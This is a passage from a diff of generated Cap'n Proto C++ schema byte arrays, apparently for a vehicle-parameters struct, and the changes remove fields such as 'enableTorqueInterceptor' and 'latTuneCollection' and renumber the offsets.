0, 0, + 228, 8, 0, 0, 3, 0, 1, 0, + 240, 8, 0, 0, 2, 0, 1, 0, + 31, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 1, 0, 31, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 237, 8, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 236, 8, 0, 0, 3, 0, 1, 0, 248, 8, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 23, 0, 0, 0, + 36, 0, 0, 0, 13, 0, 0, 0, + 0, 0, 1, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 8, 0, 0, 154, 0, 0, 0, + 245, 8, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 8, 0, 0, 3, 0, 1, 0, - 4, 9, 0, 0, 2, 0, 1, 0, - 25, 0, 0, 0, 11, 0, 0, 0, - 0, 0, 1, 0, 24, 0, 0, 0, + 244, 8, 0, 0, 3, 0, 1, 0, + 0, 9, 0, 0, 2, 0, 1, 0, + 52, 0, 0, 0, 14, 0, 0, 0, + 0, 0, 1, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 9, 0, 0, 146, 0, 0, 0, + 253, 8, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 4, 9, 0, 0, 3, 0, 1, 0, - 16, 9, 0, 0, 2, 0, 1, 0, - 26, 0, 0, 0, 8, 0, 0, 0, - 0, 0, 1, 0, 25, 0, 0, 0, + 0, 9, 0, 0, 3, 0, 1, 0, + 12, 9, 0, 0, 2, 0, 1, 0, + 32, 0, 0, 0, 30, 0, 0, 0, + 0, 0, 1, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 9, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 9, 0, 0, 3, 0, 1, 0, - 28, 9, 0, 0, 2, 0, 1, 0, - 28, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 104, 149, 51, 53, 10, 88, 252, 147, - 25, 9, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 28, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 9, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 9, 0, 0, 3, 0, 1, 0, - 16, 9, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 29, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 9, 0, 0, 106, 0, 0, 0, + 9, 9, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 9, 0, 0, 3, 0, 1, 0, 24, 9, 0, 0, 2, 0, 1, 0, - 69, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 30, 0, 0, 0, + 33, 0, 0, 0, 8, 0, 0, 0, + 0, 0, 1, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 9, 0, 0, 234, 0, 0, 0, + 21, 9, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 28, 9, 0, 0, 3, 0, 1, 0, - 40, 9, 0, 0, 2, 0, 1, 0, - 33, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 1, 0, 31, 0, 0, 0, + 24, 9, 0, 0, 3, 0, 1, 0, + 36, 9, 0, 0, 2, 0, 1, 0, + 38, 0, 0, 0, 16, 0, 0, 0, + 0, 0, 1, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 37, 9, 0, 0, 130, 0, 0, 0, + 33, 9, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 9, 0, 0, 3, 0, 1, 0, 48, 9, 0, 0, 2, 0, 1, 0, - 38, 0, 0, 0, 13, 0, 0, 0, - 0, 0, 1, 0, 32, 0, 0, 0, + 41, 0, 0, 0, 9, 0, 0, 0, + 0, 0, 1, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 45, 9, 0, 0, 90, 0, 0, 0, + 45, 9, 0, 0, 234, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 44, 9, 0, 0, 3, 0, 1, 0, - 56, 9, 0, 0, 2, 0, 1, 0, - 54, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 33, 0, 0, 0, + 52, 9, 0, 0, 3, 0, 1, 0, + 64, 9, 0, 0, 2, 0, 1, 0, + 42, 0, 0, 0, 10, 0, 0, 0, + 0, 0, 1, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 53, 9, 0, 0, 194, 0, 0, 0, + 61, 9, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 56, 9, 0, 0, 3, 0, 1, 0, 68, 9, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 30, 0, 0, 0, - 0, 0, 1, 0, 34, 0, 0, 0, + 53, 0, 0, 0, 10, 0, 0, 0, + 0, 0, 1, 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 65, 9, 0, 0, 138, 0, 0, 0, + 65, 9, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 9, 0, 0, 3, 0, 1, 0, 80, 9, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 8, 0, 0, 0, - 0, 0, 1, 0, 35, 0, 0, 0, + 43, 0, 0, 0, 11, 0, 0, 0, + 0, 0, 1, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 77, 9, 0, 0, 138, 0, 0, 0, + 77, 9, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 80, 9, 0, 0, 3, 0, 1, 0, - 92, 9, 0, 0, 2, 0, 1, 0, - 40, 0, 0, 0, 16, 0, 0, 0, - 0, 0, 1, 0, 36, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 89, 9, 0, 0, 154, 0, 0, 0, + 76, 9, 0, 0, 3, 0, 1, 0, + 88, 9, 0, 0, 2, 0, 1, 0, + 57, 0, 0, 0, 31, 0, 0, 0, + 0, 0, 1, 0, 42, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 85, 9, 0, 0, 234, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 92, 9, 0, 0, 3, 0, 1, 0, 104, 9, 0, 0, 2, 0, 1, 0, - 43, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 37, 0, 0, 0, + 44, 0, 0, 0, 34, 0, 0, 0, + 0, 0, 1, 0, 43, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 101, 9, 0, 0, 234, 0, 0, 0, + 101, 9, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 104, 9, 0, 0, 3, 0, 1, 0, + 116, 9, 0, 0, 2, 0, 1, 0, + 45, 0, 0, 0, 11, 0, 0, 0, + 0, 0, 1, 0, 44, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 113, 9, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 9, 0, 0, 3, 0, 1, 0, - 120, 9, 0, 0, 2, 0, 1, 0, - 44, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 38, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 117, 9, 0, 0, 58, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 112, 9, 0, 0, 3, 0, 1, 0, - 124, 9, 0, 0, 2, 0, 1, 0, - 55, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 39, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 121, 9, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 124, 9, 0, 0, 3, 0, 1, 0, 136, 9, 0, 0, 2, 0, 1, 0, - 45, 0, 0, 0, 11, 0, 0, 0, - 0, 0, 1, 0, 41, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 133, 9, 0, 0, 98, 0, 0, 0, + 46, 0, 0, 0, 18, 0, 0, 0, + 0, 0, 1, 0, 45, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 133, 9, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 132, 9, 0, 0, 3, 0, 1, 0, 144, 9, 0, 0, 2, 0, 1, 0, - 59, 0, 0, 0, 31, 0, 0, 0, - 0, 0, 1, 0, 42, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 141, 9, 0, 0, 234, 0, 0, 0, + 59, 0, 0, 0, 12, 0, 0, 0, + 0, 0, 1, 0, 46, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 141, 9, 0, 0, 218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 148, 9, 0, 0, 3, 0, 1, 0, 160, 9, 0, 0, 2, 0, 1, 0, - 46, 0, 0, 0, 34, 0, 0, 0, - 0, 0, 1, 0, 43, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 157, 9, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 160, 9, 0, 0, 3, 0, 1, 0, - 172, 9, 0, 0, 2, 0, 1, 0, - 47, 0, 0, 0, 11, 0, 0, 0, - 0, 0, 1, 0, 44, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 169, 9, 0, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 164, 9, 0, 0, 3, 0, 1, 0, - 192, 9, 0, 0, 2, 0, 1, 0, - 48, 0, 0, 0, 18, 0, 0, 0, - 0, 0, 1, 0, 45, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 189, 9, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 188, 9, 0, 0, 3, 0, 1, 0, - 200, 9, 0, 0, 2, 0, 1, 0, - 61, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 46, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 197, 9, 0, 0, 218, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 204, 9, 0, 0, 3, 0, 1, 0, - 216, 9, 0, 0, 2, 0, 1, 0, - 30, 0, 0, 0, 19, 0, 0, 0, + 28, 0, 0, 0, 19, 0, 0, 0, 0, 0, 1, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 9, 0, 0, 130, 0, 0, 0, + 157, 9, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 9, 0, 0, 3, 0, 1, 0, - 224, 9, 0, 0, 2, 0, 1, 0, - 27, 0, 0, 0, 12, 0, 0, 0, + 156, 9, 0, 0, 3, 0, 1, 0, + 168, 9, 0, 0, 2, 0, 1, 0, + 25, 0, 0, 0, 12, 0, 0, 0, 0, 0, 1, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 9, 0, 0, 114, 0, 0, 0, + 165, 9, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 220, 9, 0, 0, 3, 0, 1, 0, - 232, 9, 0, 0, 2, 0, 1, 0, - 49, 0, 0, 0, 35, 0, 0, 0, + 164, 9, 0, 0, 3, 0, 1, 0, + 176, 9, 0, 0, 2, 0, 1, 0, + 47, 0, 0, 0, 35, 0, 0, 0, 0, 0, 1, 0, 49, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 229, 9, 0, 0, 146, 0, 0, 0, + 173, 9, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 232, 9, 0, 0, 3, 0, 1, 0, - 244, 9, 0, 0, 2, 0, 1, 0, - 50, 0, 0, 0, 40, 0, 0, 0, + 176, 9, 0, 0, 3, 0, 1, 0, + 188, 9, 0, 0, 2, 0, 1, 0, + 48, 0, 0, 0, 40, 0, 0, 0, 0, 0, 1, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 241, 9, 0, 0, 130, 0, 0, 0, + 185, 9, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 184, 9, 0, 0, 3, 0, 1, 0, + 196, 9, 0, 0, 2, 0, 1, 0, + 58, 0, 0, 0, 21, 0, 0, 0, + 0, 0, 1, 0, 51, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 193, 9, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 196, 9, 0, 0, 3, 0, 1, 0, + 208, 9, 0, 0, 2, 0, 1, 0, + 35, 0, 0, 0, 22, 0, 0, 0, + 0, 0, 1, 0, 52, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 205, 9, 0, 0, 146, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 208, 9, 0, 0, 3, 0, 1, 0, + 220, 9, 0, 0, 2, 0, 1, 0, + 60, 0, 0, 0, 23, 0, 0, 0, + 0, 0, 1, 0, 53, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 217, 9, 0, 0, 226, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 224, 9, 0, 0, 3, 0, 1, 0, + 236, 9, 0, 0, 2, 0, 1, 0, + 68, 0, 0, 0, 24, 0, 0, 0, + 0, 0, 1, 0, 54, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 233, 9, 0, 0, 242, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 240, 9, 0, 0, 3, 0, 1, 0, 252, 9, 0, 0, 2, 0, 1, 0, - 60, 0, 0, 0, 21, 0, 0, 0, - 0, 0, 1, 0, 51, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 249, 9, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 252, 9, 0, 0, 3, 0, 1, 0, - 8, 10, 0, 0, 2, 0, 1, 0, - 37, 0, 0, 0, 22, 0, 0, 0, - 0, 0, 1, 0, 52, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 10, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 8, 10, 0, 0, 3, 0, 1, 0, - 20, 10, 0, 0, 2, 0, 1, 0, - 62, 0, 0, 0, 23, 0, 0, 0, - 0, 0, 1, 0, 53, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 17, 10, 0, 0, 226, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 24, 10, 0, 0, 3, 0, 1, 0, - 36, 10, 0, 0, 2, 0, 1, 0, - 70, 0, 0, 0, 24, 0, 0, 0, - 0, 0, 1, 0, 54, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 33, 10, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 40, 10, 0, 0, 3, 0, 1, 0, - 52, 10, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 49, 10, 0, 0, 138, 0, 0, 0, + 249, 9, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 52, 10, 0, 0, 3, 0, 1, 0, - 64, 10, 0, 0, 2, 0, 1, 0, + 252, 9, 0, 0, 3, 0, 1, 0, + 8, 10, 0, 0, 2, 0, 1, 0, 7, 0, 0, 0, 14, 0, 0, 0, 0, 0, 1, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 61, 10, 0, 0, 82, 0, 0, 0, + 5, 10, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 60, 10, 0, 0, 3, 0, 1, 0, - 72, 10, 0, 0, 2, 0, 1, 0, - 56, 0, 0, 0, 15, 0, 0, 0, + 4, 10, 0, 0, 3, 0, 1, 0, + 16, 10, 0, 0, 2, 0, 1, 0, + 54, 0, 0, 0, 15, 0, 0, 0, 0, 0, 1, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 69, 10, 0, 0, 202, 0, 0, 0, + 13, 10, 0, 0, 202, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 20, 10, 0, 0, 3, 0, 1, 0, + 32, 10, 0, 0, 2, 0, 1, 0, + 40, 0, 0, 0, 25, 0, 0, 0, + 0, 0, 1, 0, 58, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 10, 0, 0, 34, 1, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 10, 0, 0, 3, 0, 1, 0, + 52, 10, 0, 0, 2, 0, 1, 0, + 30, 0, 0, 0, 26, 0, 0, 0, + 0, 0, 1, 0, 59, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 49, 10, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 48, 10, 0, 0, 3, 0, 1, 0, + 60, 10, 0, 0, 2, 0, 1, 0, + 34, 0, 0, 0, 27, 0, 0, 0, + 0, 0, 1, 0, 60, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 57, 10, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 56, 10, 0, 0, 3, 0, 1, 0, + 68, 10, 0, 0, 2, 0, 1, 0, + 39, 0, 0, 0, 28, 0, 0, 0, + 0, 0, 1, 0, 61, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 65, 10, 0, 0, 34, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 76, 10, 0, 0, 3, 0, 1, 0, 88, 10, 0, 0, 2, 0, 1, 0, - 42, 0, 0, 0, 25, 0, 0, 0, - 0, 0, 1, 0, 58, 0, 0, 0, + 12, 0, 0, 0, 13, 0, 0, 0, + 0, 0, 1, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 85, 10, 0, 0, 34, 1, 0, 0, + 85, 10, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 96, 10, 0, 0, 3, 0, 1, 0, - 108, 10, 0, 0, 2, 0, 1, 0, - 32, 0, 0, 0, 26, 0, 0, 0, - 0, 0, 1, 0, 59, 0, 0, 0, + 84, 10, 0, 0, 3, 0, 1, 0, + 112, 10, 0, 0, 2, 0, 1, 0, + 49, 0, 0, 0, 29, 0, 0, 0, + 0, 0, 1, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 105, 10, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 104, 10, 0, 0, 3, 0, 1, 0, - 116, 10, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 27, 0, 0, 0, - 0, 0, 1, 0, 60, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 113, 10, 0, 0, 82, 0, 0, 0, + 109, 10, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 112, 10, 0, 0, 3, 0, 1, 0, 124, 10, 0, 0, 2, 0, 1, 0, - 41, 0, 0, 0, 28, 0, 0, 0, - 0, 0, 1, 0, 61, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 121, 10, 0, 0, 34, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 132, 10, 0, 0, 3, 0, 1, 0, - 144, 10, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 13, 0, 0, 0, - 0, 0, 1, 0, 62, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 141, 10, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 140, 10, 0, 0, 3, 0, 1, 0, - 168, 10, 0, 0, 2, 0, 1, 0, - 51, 0, 0, 0, 29, 0, 0, 0, - 0, 0, 1, 0, 63, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 165, 10, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 168, 10, 0, 0, 3, 0, 1, 0, - 180, 10, 0, 0, 2, 0, 1, 0, 8, 0, 0, 0, 30, 0, 0, 0, 0, 0, 1, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 177, 10, 0, 0, 50, 0, 0, 0, + 121, 10, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 172, 10, 0, 0, 3, 0, 1, 0, - 184, 10, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 41, 0, 0, 0, + 116, 10, 0, 0, 3, 0, 1, 0, + 128, 10, 0, 0, 2, 0, 1, 0, + 13, 0, 0, 0, 41, 0, 0, 0, 0, 0, 1, 0, 65, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 181, 10, 0, 0, 178, 0, 0, 0, + 125, 10, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 184, 10, 0, 0, 3, 0, 1, 0, - 196, 10, 0, 0, 2, 0, 1, 0, + 128, 10, 0, 0, 3, 0, 1, 0, + 140, 10, 0, 0, 2, 0, 1, 0, 3, 0, 0, 0, 224, 3, 0, 0, 0, 0, 1, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 193, 10, 0, 0, 58, 0, 0, 0, + 137, 10, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 188, 10, 0, 0, 3, 0, 1, 0, - 200, 10, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 32, 0, 0, 0, + 132, 10, 0, 0, 3, 0, 1, 0, + 144, 10, 0, 0, 2, 0, 1, 0, + 14, 0, 0, 0, 32, 0, 0, 0, 0, 0, 1, 0, 68, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 10, 0, 0, 130, 0, 0, 0, + 141, 10, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 196, 10, 0, 0, 3, 0, 1, 0, - 208, 10, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 225, 3, 0, 0, + 140, 10, 0, 0, 3, 0, 1, 0, + 152, 10, 0, 0, 2, 0, 1, 0, + 15, 0, 0, 0, 225, 3, 0, 0, 0, 0, 1, 0, 69, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 10, 0, 0, 114, 0, 0, 0, + 149, 10, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 10, 0, 0, 3, 0, 1, 0, - 216, 10, 0, 0, 2, 0, 1, 0, - 39, 0, 0, 0, 226, 3, 0, 0, + 148, 10, 0, 0, 3, 0, 1, 0, + 160, 10, 0, 0, 2, 0, 1, 0, + 37, 0, 0, 0, 226, 3, 0, 0, 0, 0, 1, 0, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 10, 0, 0, 114, 0, 0, 0, + 157, 10, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 10, 0, 0, 3, 0, 1, 0, - 224, 10, 0, 0, 2, 0, 1, 0, + 156, 10, 0, 0, 3, 0, 1, 0, + 168, 10, 0, 0, 2, 0, 1, 0, 9, 0, 0, 0, 227, 3, 0, 0, 0, 0, 1, 0, 71, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 10, 0, 0, 18, 1, 0, 0, + 165, 10, 0, 0, 18, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 232, 10, 0, 0, 3, 0, 1, 0, - 244, 10, 0, 0, 2, 0, 1, 0, - 10, 0, 0, 0, 228, 3, 0, 0, - 0, 0, 1, 0, 72, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 241, 10, 0, 0, 194, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 244, 10, 0, 0, 3, 0, 1, 0, - 0, 11, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 73, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 253, 10, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 11, 0, 0, 3, 0, 1, 0, - 12, 11, 0, 0, 2, 0, 1, 0, + 176, 10, 0, 0, 3, 0, 1, 0, + 188, 10, 0, 0, 2, 0, 1, 0, 99, 97, 114, 78, 97, 109, 101, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -4920,26 +4741,6 @@ static const ::capnp::_::AlignedData<1290> b_8c69372490aaa9da = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 101, 110, 97, 98, 108, 101, 84, 111, - 114, 113, 117, 101, 73, 110, 116, 101, - 114, 99, 101, 112, 116, 111, 114, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 116, 84, 117, 110, 101, 67, - 111, 108, 108, 101, 99, 116, 105, 111, - 110, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 87, 219, 214, 99, 173, 58, 46, 247, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -4955,93 +4756,13 @@ static const ::capnp::_::RawSchema* const d_8c69372490aaa9da[] = { &s_c342cefc303e9b8e, &s_d661512be2def77f, &s_e836349c6056b0c9, - &s_f72e3aad63d6db57, &s_ff99e3682a833c51, }; -static const uint16_t m_8c69372490aaa9da[] = {63, 66, 15, 16, 1, 42, 0, 37, 19, 44, 39, 29, 6, 54, 4, 5, 2, 69, 68, 47, 62, 53, 13, 14, 55, 38, 70, 46, 26, 59, 56, 25, 17, 65, 52, 7, 49, 8, 48, 64, 36, 3, 43, 34, 22, 60, 9, 40, 10, 31, 51, 67, 35, 33, 27, 45, 11, 12, 32, 20, 21, 58, 30, 50, 23, 24, 41, 57, 28, 61, 18}; -static const uint16_t i_8c69372490aaa9da[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70}; +static const uint16_t m_8c69372490aaa9da[] = {63, 66, 15, 16, 1, 42, 0, 37, 19, 44, 39, 29, 6, 54, 4, 5, 2, 68, 47, 62, 53, 13, 14, 55, 38, 46, 26, 59, 56, 25, 17, 65, 52, 7, 49, 8, 48, 64, 36, 3, 43, 34, 22, 60, 9, 40, 10, 31, 51, 67, 35, 33, 27, 45, 11, 12, 32, 20, 21, 58, 30, 50, 23, 24, 41, 57, 28, 61, 18}; +static const uint16_t i_8c69372490aaa9da[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68}; const ::capnp::_::RawSchema s_8c69372490aaa9da = { - 0x8c69372490aaa9da, b_8c69372490aaa9da.words, 1290, d_8c69372490aaa9da, m_8c69372490aaa9da, - 11, 71, i_8c69372490aaa9da, nullptr, nullptr, { &s_8c69372490aaa9da, nullptr, nullptr, 0, 0, nullptr } -}; -#endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<63> b_f72e3aad63d6db57 = { - { 0, 0, 0, 0, 5, 0, 6, 0, - 87, 219, 214, 99, 173, 58, 46, 247, - 20, 0, 0, 0, 1, 0, 0, 0, - 218, 169, 170, 144, 36, 55, 105, 140, - 3, 0, 7, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 234, 0, 0, 0, - 33, 0, 0, 0, 7, 0, 0, 0, - 0, 